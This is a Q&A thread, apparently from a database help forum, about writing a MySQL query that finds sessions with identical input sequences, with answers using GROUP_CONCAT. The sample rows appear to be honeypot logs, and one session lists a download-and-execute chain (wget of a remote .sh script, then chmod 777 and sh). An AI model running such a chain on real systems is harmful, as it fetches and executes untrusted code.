# How to select the same data for unique item?

Tags: mysql, select

I have this SQL table:

```
+-----------+-------------+------+-----+---------+----------------+
| Field     | Type        | Null | Key | Default | Extra          |
+-----------+-------------+------+-----+---------+----------------+
| id        | int(11)     | NO   | PRI | NULL    | auto_increment |
| session   | char(32)    | NO   | MUL | NULL    |                |
| timestamp | datetime    | NO   |     | NULL    |                |
| realm     | varchar(50) | YES  |     | NULL    |                |
| success   | tinyint(1)  | YES  |     | NULL    |                |
| input     | text        | NO   |     | NULL    |                |
+-----------+-------------+------+-----+---------+----------------+
```

CREATE TABLE output:

```
| input | CREATE TABLE `input` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `session` char(32) NOT NULL,
  `timestamp` datetime NOT NULL,
  `realm` varchar(50) DEFAULT NULL,
  `success` tinyint(1) DEFAULT NULL,
  `input` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `session` (`session`,`timestamp`,`realm`)
) ENGINE=InnoDB AUTO_INCREMENT=263867 DEFAULT CHARSET=latin1 |
```

One unique session can has a lot of inputs, for example:

```
+--------+----------------------------------+---------------------+-------+---------+-------------------------+
| id     | session                          | timestamp           | realm | success | input                   |
+--------+----------------------------------+---------------------+-------+---------+-------------------------+
| 238483 | fb13c01d6eac414ca890d4cda3309e96 | 2016-05-08 07:17:20 | NULL  |       1 | cd /tmp || cd /var/run  |
| 238484 | fb13c01d6eac414ca890d4cda3309e96 | 2016-05-08 07:17:20 | NULL  |       1 | cd /etc                 |                                           
| 238488 | fb13c01d6eac414ca890d4cda3309e96 | 2016-05-08 07:17:20 | NULL  |       1 | wget http://web.www/0.sh|
| 238489 | fb13c01d6eac414ca890d4cda3309e96 | 2016-05-08 07:17:25 | NULL  |       1 | chmod 777 aaa.sh        |
| 238490 | fb13c01d6eac414ca890d4cda3309e96 | 2016-05-08 07:17:25 | NULL  |       1 | sh aaa.sh               |
| 238491 | fb13c01d6eac414ca890d4cda3309e96 | 2016-05-08 07:17:25 | NULL  |       1 | wget                    |
+--------+----------------------------------+---------------------+-------+---------+-------------------------+
```

Other next unique session has a lot of inputs too for example:

```
+--------+----------------------------------+---------------------+-------+---------+-------------------------+
| id     | session                          | timestamp           | realm | success | input                   |
+--------+----------------------------------+---------------------+-------+---------+-------------------------+
| 238493 | 68ea19620a8711e4955f0800271247b3 | 2016-06-09 08:17:20 | NULL  |       1 | cd /opt                 |
| 238494 | 68ea19620a8711e4955f0800271247b3 | 2016-05-09 08:17:22 | NULL  |       1 | pwd                     |
+--------+----------------------------------+---------------------+-------+---------+-------------------------+
```

And next unique session can has the same inputs as other unique session, for example:

```
+--------+----------------------------------+---------------------+-------+---------+-------------------------+
| id     | session                          | timestamp           | realm | success | input                   |
+--------+----------------------------------+---------------------+-------+---------+-------------------------+
| 238511 | a570f5cc0a9111e4955f0800271247b3 | 2016-06-10 07:19:20 | NULL  |       1 | cd /opt                 |
| 238512 | a570f5cc0a9111e4955f0800271247b3 | 2016-05-10 07:20:20 | NULL  |       1 | pwd                     |
+--------+----------------------------------+---------------------+-------+---------+-------------------------+
```

Now I need select all sessions which have the same inputs. So in this example it will be two sessions: 68ea19620a8711e4955f0800271247b3 and a570f5cc0a9111e4955f0800271247b3. What way can I get correct results for all records in the table please?

### EDIT

Hello,

I am a friend of the OP, so I attempt to clarify the question a bit. Let's say we have a table that lists privileges granted to individual users. The table has two columns: UserId (integer) and PrivilegeName (varchar). Let's say the table has the following content:

```
UserId    PrivilegeName
-----------------------
1          read
2          read
3          write
2          execute
1          execute
3          read
3          execute
```

As you can see, users 1 and 2 have read and execute privileges, whereas the user 3 has read, write and execute ones. Users 1 and 2 have exactly the same privileges.

And finally the question: how to list users that have EXACTLY THE SAME privileges? For the sample case, the response is {1, 2}. In practice, more sets can be returned if more groups of users having exactly the same privileges (e.g. users 1 and 2 have read and execute, and users 3 and 4 have write privilege) exist.

This is basically the problem. Well, the OP actually needs to list user sets that not only have exactly the same privileges but the privileges were granted to them in the same order (e.g. there may be a column containing a date when a privilege was granted).

Answer (score 1, accepted):

Plan A:  First get 1 row per user:

```
SELECT user_id,
       GROUP_CONCAT(priv ORDER BY priv) AS privileges
    FROM tbl
    GROUP BY user_id
```

Then look for dups

```
SELECT GROUP_CONCAT(user_id) AS users,
       privileges
    FROM ( the select above ) x
    GROUP BY privileges
    HAVING COUNT(*) > 1;
```

Plan B:  This involves changing the data structure.  By using the datatyps `SET` instead of multiple rows, you can have

```
CREATE TABLE foo(
    user_id ...,
    privs ENUM('read', 'write', ...) NOT NULL
)
```

Then do

```
SELECT GROUP_CONCAT(user_id) AS users
       privs
    FROM foo
    GROUP BY privs
    HAVING COUNT(*) > 1;
```

If this fails to map to something in the original question, maybe I have given you some things to think about.  Or maybe "normalization" of the original table(s) would help make it look more like my example.

Notes: `GROUP_CONCAT` has, by default, a limit of 1024 characters; this can be increased. There may be a limit on how long a string can be for use in `GROUP BY privileges`.

Answer (score 0):

Try something like this:

```
select * from tbl where input IN (select input from tbl group by input having count(*) > 1);
```

**FIXED**

Comment: thanks, but I get error: ERROR 1241 (21000): Operand should contain 1 column(s)

Comment: I fixed the request: `select * from tbl where input IN (select input from tbl group by input having count(*) > 1);`

Comment: OK - interesting question. But, I'm not going to type all that in. Show us the output of "SHOW CREATE TABLE\G", sample records (mysqldump is good for this) **and** what you want to keep, what you want deleted, and your logic to get that result. Why is session "fb13c01d6eac414ca890d4cda3309e96" not kept?

Comment: @Alexey Thanks, but this select frozen.

Comment: @Vérace you can see that session fb13c01d6eac414ca890d4cda3309e96 has on each row different context than others sessions in my example. And next other sessions have on each row the same context. I need select all unique sessions that have the same context on each their input row than other unique sessions. I have added SHOW CREATE TABLE output.

Comment: @Alexey Your select uses temporary and filesort, so please do you know any better/optimal way?

Comment: What do you mean by "same results"?  2 lines?  Both with success=1?  What if some have success=0? Or different inputs?  Etc, etc.

Comment: @RickJames I mean all rows for unique session that have the same content in input column such as other unique session(s) on all of their rows in input column, other columns on each row for each session can be different. In my example sessions 68ea19620a8711e4955f0800271247b3 and a570f5cc0a9111e4955f0800271247b3 have the same context in input column on each row (this is it what I need) and different content on other columns (attributes) on each row - for example different timestamps.

Comment: Question was edited, it should be more clear now.